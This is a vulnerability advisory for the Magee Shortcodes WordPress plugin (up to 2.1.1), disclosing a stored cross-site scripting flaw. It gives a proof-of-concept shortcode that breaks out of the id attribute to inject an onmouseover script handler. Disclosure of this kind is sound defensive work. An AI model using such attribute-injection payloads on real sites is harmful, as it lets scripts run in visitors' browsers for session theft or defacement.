WordPress Plugin Vulnerabilities
Magee Shortcodes <= 2.1.1 - Contributor+ Stored XSS via shortcode
Description
The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.
Proof of Concept
[ms_alert icon="fa-exclamation-circle" background_color="#ffcc00" text_color="#ffffff" border_width="0" border_radius="0" box_shadow="no" dismissable="yes" class="" id='" onmouseover="alert(/XSS/)"']Warning! Better check yourself, you're not looking too good.[/ms_alert]
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Dmitrii Ignatyev
Submitter
Dmitrii Ignatyev
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-09-21 (about 7 months ago)
Added
2023-09-21 (about 7 months ago)
Last Updated
2024-02-12 (about 3 months ago)